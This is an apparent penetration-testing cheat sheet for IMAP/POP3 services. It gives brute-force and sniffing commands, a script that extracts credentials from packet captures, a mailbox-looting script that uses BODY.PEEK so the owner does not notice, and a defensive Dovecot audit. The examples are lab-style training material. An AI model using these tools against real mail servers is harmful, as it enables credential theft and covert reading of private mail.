πŸ›‘οΈ Methodology Checklist

  • Banner grab: nc [TARGET] 143 (IMAP) or nc [TARGET] 110 (POP3)
  • Identify mail server software and version
  • Test anonymous/null auth: A1 LOGIN "" ""
  • Brute-force credentials: hydra -L users.txt -P pass.txt imap://[TARGET]
  • If authenticated: enumerate mailboxes (A1 LIST "" "*")
  • Read mails for credentials, internal info: A1 FETCH 1 BODY.PEEK[] (plain BODY[] marks the message \Seen and tips off the owner)
  • Check POP3: USER [user] / PASS [pass] / LIST / RETR 1
  • Test for known mail server CVEs (SLmail, IMail, etc.)

🎯 Operational Context

Think Dumber First: Check for cleartext authentication on ports 143/110 before attempting brute-force. If you are on the same segment, capture credentials with tcpdump -i [IFACE] -w capture.pcap 'port 143 or 110'. Many IMAP deployments do not lock accounts on failed logins (Exchange and anything authenticating against AD usually do), so try the top 20 common corporate passwords against discovered usernames before running a full Hydra job, and confirm the lockout policy first wherever the backend is a domain.
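To turn that capture into credentials without opening Wireshark, here is an added example (not from the original page): a Python script that reads the classic libpcap file tcpdump writes, reassembles the client side of each TCP flow to port 143 or 110, and pulls out IMAP LOGIN, IMAP AUTHENTICATE PLAIN (decoding the NUL-separated SASL blob) and POP3 USER/PASS credentials. The capture it parses by default is built in memory from constructed frames; the hosts, usernames and passwords in it are made up, and the function names are this example's own.

```python
"""Cleartext IMAP/POP3 credential sweep over a tcpdump capture.
Added example, not from the original page. Reads classic libpcap files
(what `tcpdump -w capture.pcap 'port 143 or 110'` writes), reassembles the
client side of each TCP flow to 143/110 and extracts LOGIN, AUTHENTICATE
PLAIN and USER/PASS credentials. The default capture is constructed below."""
import base64
import re
import struct
import sys
from collections import defaultdict

MAIL_PORTS = {110, 143}
LOGIN_RX = re.compile(r'^\S+ LOGIN "?([^"\s]+)"? "?([^"\r\n]+?)"?\r?$', re.M)
PLAIN_RX = re.compile(r"^\S+ AUTHENTICATE PLAIN(?: |\r?\n)([A-Za-z0-9+/=]+)", re.M)
POP3_RX = re.compile(r"^USER (\S+)\r?\nPASS (\S+)", re.M | re.I)


def tcp_payloads(pcap):
    """Yield (src, dst, sport, dport, payload) for each IPv4/TCP frame in a
    little-endian libpcap file with Ethernet link type (tcpdump's default)."""
    magic, linktype = struct.unpack_from("<I", pcap, 0)[0], struct.unpack_from("<I", pcap, 20)[0]
    if magic not in (0xA1B2C3D4, 0xA1B23C4D) or linktype != 1:
        raise ValueError("expected little-endian pcap with Ethernet frames")
    off = 24
    while off + 16 <= len(pcap):
        caplen = struct.unpack_from("<I", pcap, off + 8)[0]
        frame = pcap[off + 16:off + 16 + caplen]
        off += 16 + caplen
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue  # not IPv4, or not TCP
        ihl, total = (frame[14] & 0x0F) * 4, struct.unpack_from("!H", frame, 16)[0]
        ip, tcp = frame[14:14 + ihl], frame[14 + ihl:14 + total]
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        payload = tcp[(tcp[12] >> 4) * 4:]  # skip TCP header incl. options
        yield ".".join(map(str, ip[12:16])), ".".join(map(str, ip[16:20])), sport, dport, payload


def extract_credentials(pcap):
    """Concatenate client->server bytes per flow to 143/110 (packets assumed in
    order, no retransmits) and return (client, server:port, mech, user, pass)."""
    flows = defaultdict(bytes)
    for src, dst, sport, dport, payload in tcp_payloads(pcap):
        if dport in MAIL_PORTS and payload:
            flows[(src, sport, dst, dport)] += payload
    creds = []
    for (src, _, dst, dport), data in flows.items():
        text, server = data.decode("latin-1"), f"{dst}:{dport}"
        creds += [(src, server, "LOGIN", u, p) for u, p in LOGIN_RX.findall(text)]
        creds += [(src, server, "USER/PASS", u, p) for u, p in POP3_RX.findall(text)]
        for blob in PLAIN_RX.findall(text):
            try:  # RFC 4616: authzid NUL authcid NUL passwd
                parts = base64.b64decode(blob, validate=True).split(b"\0")
            except ValueError:
                continue
            if len(parts) == 3:
                creds.append((src, server, "PLAIN", parts[1].decode(errors="replace"),
                              parts[2].decode(errors="replace")))
    return creds


def build_frame(src, dst, sport, dport, payload):
    """Minimal Ethernet/IPv4/TCP frame for the constructed capture (checksums
    left zero; the parser never checks them)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp


def build_pcap(frames):
    """Wrap frames in a libpcap global header and per-record headers."""
    hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    return hdr + b"".join(struct.pack("<IIII", 0, 0, len(f), len(f)) + f for f in frames)


# Constructed capture: IMAP LOGIN, IMAP AUTHENTICATE PLAIN (SASL-IR form), POP3 USER/PASS.
SAMPLE_PCAP = build_pcap([
    build_frame("10.10.14.7", "10.129.42.195", 51000, 143, b"A1 LOGIN alice Winter2024!\r\n"),
    build_frame("10.129.42.195", "10.10.14.7", 143, 51000, b"A1 OK Logged in\r\n"),
    build_frame("10.10.14.7", "10.129.42.195", 51001, 143, b"A1 AUTHENTICATE PLAIN AGJvYgBodW50ZXIy\r\n"),
    build_frame("10.10.14.9", "10.129.42.195", 52000, 110, b"USER carol\r\n"),
    build_frame("10.10.14.9", "10.129.42.195", 52000, 110, b"PASS Pa55w0rd\r\n"),
])

if __name__ == "__main__":  # python3 mailcreds.py capture.pcap
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PCAP
    for cred in extract_credentials(data):
        print("%s -> %s  %-9s %s : %s" % cred)
```

The reassembly is deliberately naive (in-order packets, no retransmissions), which is adequate for the short login exchanges you are after; `tcpflow -r capture.pcap` gives you proper reassembly if a capture is messy.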

When you land here: Ports 143, 110, 993, or 995 open. Banner grab reveals Dovecot/Courier/Exchange IMAP. Test LOGIN first, then AUTHENTICATE PLAIN if LOGIN is disabled or refused. If the server requires TLS, wrap the session with openssl s_client. Usernames confirmed through SMTP VRFY/RCPT TO are your target list.


⚑ Tactical Cheatsheet

Command | Tactical Outcome
sudo nmap -sV -p110,143,993,995 -sC [TARGET_IP] | Detect versions and grab SSL certificate info
openssl s_client -connect [TARGET_IP]:993 | Connect to IMAPS: view the certificate and interact
openssl s_client -connect [TARGET_IP]:995 | Connect to POP3S: view the certificate
curl -k 'imaps://[TARGET_IP]' --user [USER]:[PASS] -v | List IMAP mailboxes with credentials

IMAP commands (prefix every command with a tag, e.g. A1)
Command | Tactical Outcome
A1 LOGIN [user] [pass] | Authenticate
A1 LIST "" * | List all folders/mailboxes
A1 SELECT INBOX | Enter a folder
A1 FETCH 1:* (BODY[]) | Retrieve all emails (marks them \Seen)
A1 FETCH 1 (BODY.PEEK[]) | Read an email without marking it as read
A1 LOGOUT | Close connection

POP3 commands (no tags)
Command | Tactical Outcome
USER [username] | Identify user
PASS [password] | Authenticate
STAT | Get count of saved emails
LIST | List size/ID of all emails
RETR [ID] | Read a specific email
QUIT | Close connection

🔬 Deep Dive & Workflow

IMAP commands must be prefixed with a client-chosen tag (e.g. A1, A2) that the server echoes in its tagged OK/NO/BAD reply; POP3 commands take no tags.

Initial Enumeration

  • Nmap: sudo nmap -sV -p110,143,993,995 -sC [TARGET_IP]
  • SSL cert grab: openssl s_client -connect [TARGET_IP]:993
    • Extract O= (Organization), CN= (FQDN), emailAddress= (admin email)
    • Note software version from banner (e.g., Dovecot, InFreight POP3 v9.188)
  • If credentials found: curl -k 'imaps://[TARGET_IP]' --user [USER]:[PASS] -v

Attacks

  • Brute-force credentials if anonymous access unavailable
  • Login and A2 LIST "" *: look for non-standard folders (e.g., DEV.DEPARTMENT.INT)
  • Fetch all emails: A3 FETCH 1:* (BODY.PEEK[]) and look for SSH keys, passwords, internal data (PEEK leaves the messages unread, so the mailbox owner sees nothing)
  • With local access, check the Dovecot config (doveconf -n, or /etc/dovecot/dovecot.conf) for dangerous settings: auth_debug_passwords = yes writes passwords to the auth log in cleartext
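The enumeration and attack steps above, from the certificate and banner through LIST to message triage, as one script. This is an added example and not code from the original page: the parsers run offline on constructed samples (an openssl s_client transcript, a LIST response and a message for the fictitious dev.inlanefreight.htb host), and loot_mailbox() is the live imaplib path that needs a reachable target and valid credentials. Function names, the STANDARD_FOLDERS set and the LOOT_PATTERNS regexes are this example's own choices.

```python
"""IMAP recon-to-loot helper. Added example for this page, not the page's own
code. The parsers run offline on the constructed samples at the bottom;
loot_mailbox() is the live path and needs a reachable target plus credentials."""
import base64
import imaplib
import re
import sys

STANDARD_FOLDERS = {"INBOX", "Sent", "Drafts", "Trash", "Junk", "Archive"}
LOOT_PATTERNS = {  # what justifies pulling a message in full during triage
    "ssh_private_key": re.compile(r"-----BEGIN (?:\w+ )?PRIVATE KEY-----"),
    "password_hint": re.compile(r"\b(?:password|passwd|pwd)\b\s*[:=]\s*\S+", re.I),
    "internal_host": re.compile(r"\b[\w-]+\.[\w-]+\.(?:int|internal|local|htb)\b", re.I),
}

def sasl_plain(user, password, authzid=""):
    """AUTHENTICATE PLAIN blob per RFC 4616: authzid NUL authcid NUL passwd.
    base64(user + pass) without the two NULs is rejected by every server."""
    return base64.b64encode(f"{authzid}\0{user}\0{password}".encode()).decode()

def cert_intel(s_client_output):
    """O=, CN= and emailAddress= from the 'subject=' line openssl s_client
    prints, in either the 'O = X, CN = Y' or the older '/O=X/CN=Y' layout."""
    m = re.search(r"^subject=\s*(.+)$", s_client_output, re.M)
    pairs = [p.split("=", 1) for p in re.split(r"[,/]\s*", m.group(1) if m else "")]
    fields = {k.strip(): v.strip() for k, v in (p for p in pairs if len(p) == 2)}
    return {k: fields[k] for k in ("O", "CN", "emailAddress") if k in fields}

def greeting_info(s_client_output):
    """Server string and capabilities from the '* OK' greeting: which AUTH=
    mechanisms are offered, and whether LOGINDISABLED blocks cleartext LOGIN."""
    m = re.search(r"^\* OK (?:\[CAPABILITY ([^\]]*)\] )?(.*)$", s_client_output, re.M)
    caps = (m.group(1) or "").split() if m else []
    return {"banner": m.group(2).strip() if m else "",
            "auth": [c[5:] for c in caps if c.startswith("AUTH=")],
            "login_disabled": "LOGINDISABLED" in caps}

def interesting_folders(list_lines):
    """Non-standard mailboxes (e.g. DEV.DEPARTMENT.INT) from LIST output; takes
    raw '* LIST ...' lines or the stripped form imaplib.list() returns."""
    rx = re.compile(r'^(?:\* LIST )?\([^)]*\) (?:"[^"]*"|NIL) "?([^"\r\n]+?)"?\s*$')
    names = [m.group(1) for m in map(rx.match, list_lines) if m]
    return [n for n in names if n not in STANDARD_FOLDERS]

def triage_message(body):
    """Names of the LOOT_PATTERNS that fire on a fetched message body."""
    return [name for name, rx in LOOT_PATTERNS.items() if rx.search(body)]

def loot_mailbox(host, user, password, port=993):
    """Live path: LOGIN, LIST, then BODY.PEEK[] every message in the interesting
    folders (INBOX if there are none) so nothing gets flagged \\Seen."""
    imap = imaplib.IMAP4_SSL(host, port)
    imap.login(user, password)
    folders = interesting_folders(l.decode() for l in imap.list()[1]) or ["INBOX"]
    hits = {}
    for folder in folders:
        imap.select(f'"{folder}"', readonly=True)
        for num in imap.search(None, "ALL")[1][0].split():
            body = imap.fetch(num, "(BODY.PEEK[])")[1][0][1].decode(errors="replace")
            if tags := triage_message(body):
                hits[f"{folder}/{num.decode()}"] = tags
    imap.logout()
    return hits

# Constructed samples: openssl s_client output, a LIST response and one message.
SAMPLE_S_CLIENT = """\
CONNECTED(00000003)
subject=C = US, O = InlaneFreight Ltd, CN = dev.inlanefreight.htb, emailAddress = cto@dev.inlanefreight.htb
issuer=C = US, O = InlaneFreight Ltd, CN = dev.inlanefreight.htb
---
* OK [CAPABILITY IMAP4rev1 SASL-IR AUTH=PLAIN AUTH=LOGIN] Dovecot (Ubuntu) ready.
"""
SAMPLE_LIST = r"""* LIST (\HasNoChildren) "." INBOX
* LIST (\HasNoChildren) "." Sent
* LIST (\HasChildren) "." DEV
* LIST (\HasNoChildren) "." DEV.DEPARTMENT.INT
A2 OK List completed (0.001 + 0.000 secs).""".splitlines()
SAMPLE_MSG = """\
From: cto@dev.inlanefreight.htb
Subject: build box access

The key below is a constructed placeholder, not a real key.
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAA
-----END OPENSSH PRIVATE KEY-----
password: Summer2024!
"""

if __name__ == "__main__":
    if len(sys.argv) == 4:  # python3 imap_loot.py HOST USER PASS
        print(loot_mailbox(*sys.argv[1:4]))
    else:
        print(cert_intel(SAMPLE_S_CLIENT), greeting_info(SAMPLE_S_CLIENT))
        print(interesting_folders(SAMPLE_LIST), triage_message(SAMPLE_MSG))
```

Read greeting_info() before choosing a mechanism: an "auth" list without PLAIN or a "login_disabled" of True on port 143 means you go straight to 993 (or STARTTLS) rather than debugging "invalid credentials".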

Protocol Differences

  • IMAP: Manages emails directly on server. Supports folders. Server-side sync.
  • POP3: Downloads emails to client. Simple, usually only INBOX. No sync.

Ports

Port | Protocol | Encryption
110 | POP3 | Cleartext
143 | IMAP | Cleartext
993 | IMAP | SSL/TLS
995 | POP3 | SSL/TLS

Certificate Intelligence (CPTS Exam)

Question | Where to Look | Example
Organization | O= in cert subject | InlaneFreight Ltd
FQDN | CN= in cert subject | dev.inlanefreight.htb
Admin Email | emailAddress= in cert subject | cto@dev.inlanefreight.htb
Service Version | First line after connect | Dovecot
Flag in banner | IMAP greeting | * OK ... HTB{flag}

Dangerous Config Settings

Setting | Risk
auth_debug = yes | Enables verbose auth logging; may leak usernames and mechanisms
auth_debug_passwords = yes | CRITICAL: logs passwords in cleartext
auth_anonymous_username (effective when anonymous is listed in auth_mechanisms) | Anonymous login allowed; every ANONYMOUS SASL login is mapped to this username (default: anonymous)
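A small audit script for those settings, as an added example that is not part of the original page or of Dovecot: it parses the flat key = value output of doveconf -n, fills in Dovecot's defaults for absent keys, and reports the dangerous settings from the table alongside the TLS posture. The weak and hardened configs it runs on are constructed, and the severity labels and function names are this example's own.

```python
"""Dovecot setting audit. Added example for this page, not Dovecot's own tooling.
Feed it the text of `doveconf -n` (or dovecot.conf) read on a host you have local
access to; it reports the dangerous settings from the table above plus the TLS
posture. Dovecot's defaults are filled in for absent keys. Both configs below
are constructed."""
import re

SEVERITY = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3}
# setting -> (value that is a finding, severity, why it matters)
CHECKS = {
    "auth_debug_passwords": ("yes", "CRITICAL", "cleartext passwords written to the auth log"),
    "disable_plaintext_auth": ("no", "HIGH", "LOGIN/PLAIN accepted before STARTTLS on 143/110"),
    "ssl": ("no", "HIGH", "TLS switched off; only cleartext listeners remain"),
    "auth_debug": ("yes", "LOW", "verbose auth logging may leak usernames and mechanisms"),
}
DEFAULTS = {"auth_debug_passwords": "no", "disable_plaintext_auth": "yes", "ssl": "yes",
            "auth_debug": "no", "auth_mechanisms": "plain", "auth_anonymous_username": "anonymous"}


def parse_doveconf(text):
    """Flat 'key = value' map: comments stripped, first occurrence of a key wins."""
    cfg = {}
    for line in text.splitlines():
        m = re.match(r"^\s*([A-Za-z_]\w*)\s*=\s*(.*?)\s*$", line.split("#", 1)[0])
        if m and m.group(1) not in cfg:
            cfg[m.group(1)] = m.group(2)
    return cfg


def audit_dovecot(text):
    """Return (severity, setting, value, why) tuples, worst first."""
    cfg = {**DEFAULTS, **parse_doveconf(text)}
    findings = [(sev, key, cfg[key], why) for key, (bad, sev, why) in CHECKS.items()
                if cfg[key].lower() == bad]
    if "anonymous" in cfg["auth_mechanisms"].lower().split():
        findings.append(("HIGH", "auth_mechanisms", cfg["auth_mechanisms"],
                         f"ANONYMOUS SASL enabled; such logins map to '{cfg['auth_anonymous_username']}'"))
    if cfg["ssl"].lower() == "yes":  # offered but optional; 'required' refuses non-TLS sessions
        findings.append(("MEDIUM", "ssl", "yes", "TLS optional; set ssl = required"))
    return sorted(findings, key=lambda f: SEVERITY[f[0]])


WEAK_CONF = """\
# constructed: doveconf -n from a misconfigured host
protocols = imap pop3
ssl = no
disable_plaintext_auth = no
auth_mechanisms = plain login anonymous
auth_anonymous_username = guest
auth_debug = yes
auth_debug_passwords = yes
"""
HARDENED_CONF = """\
# constructed: the same host after remediation
protocols = imap pop3
ssl = required
ssl_cert = </etc/dovecot/certs/mail.pem
ssl_key = </etc/dovecot/private/mail.key
disable_plaintext_auth = yes
auth_mechanisms = plain login
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_dovecot(conf) or "no findings")
```

Run it against doveconf -n output rather than a hand-edited dovecot.conf where you can: doveconf resolves includes and prints the values actually in effect, which is what the report has to stand on.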

πŸ› οΈ Troubleshooting & Edge Cases

Problem | Cause | Fix
curl IMAP fails with an SSL certificate error | Self-signed certificate or hostname mismatch | Add -k: curl -k --user [USER]:[PASS] imaps://[TARGET]/INBOX
STARTTLS rejected after CAPABILITY on 143 | STARTTLS is not offered on 143; TLS is only on the dedicated port | Connect directly to 993 (IMAPS): openssl s_client -connect [TARGET]:993
LOGIN or AUTHENTICATE LOGIN returns NO [AUTHENTICATIONFAILED] with valid credentials (IMAP answers NO; a 535 code is SMTP) | LOGINDISABLED before STARTTLS, wrong username form (user, user@domain, DOMAIN\user) or account lockout | Try AUTHENTICATE PLAIN with base64("\0user\0pass") (two NUL separators, not base64(userpass)); try the other username forms; verify the account is not locked via LDAP
Telnet/nc session drops immediately on connect | Service requires TLS from the first byte (993/995) | openssl s_client -connect [TARGET]:993 -quiet for an interactive IMAPS session (add -crlf if the server wants CRLF line endings)
Hydra IMAP brute-force reports every attempt as failed | Rate limiting or connection resets, or cleartext LOGIN disabled on 143 | Reduce threads (-t 2), add a delay (-W 5), confirm the login format with -e ns, and target imaps://[TARGET] when 143 advertises LOGINDISABLED

πŸ“ Reporting Trigger

Finding Title: Cleartext IMAP/POP3 Authentication Permitted
Impact: Credentials are transmitted in plaintext and can be intercepted on any shared network segment. Valid email account credentials may enable lateral movement if they are reused elsewhere.
Root Cause: Plaintext IMAP (143) and POP3 (110) ports are active without STARTTLS enforcement; the server configuration does not require TLS.
Recommendation: Disable plaintext ports 143 and 110 and serve IMAPS (993) and POP3S (995) exclusively. Configure disable_plaintext_auth = yes and ssl = required (Dovecot) or the equivalent on other servers. Implement multi-factor authentication for email access.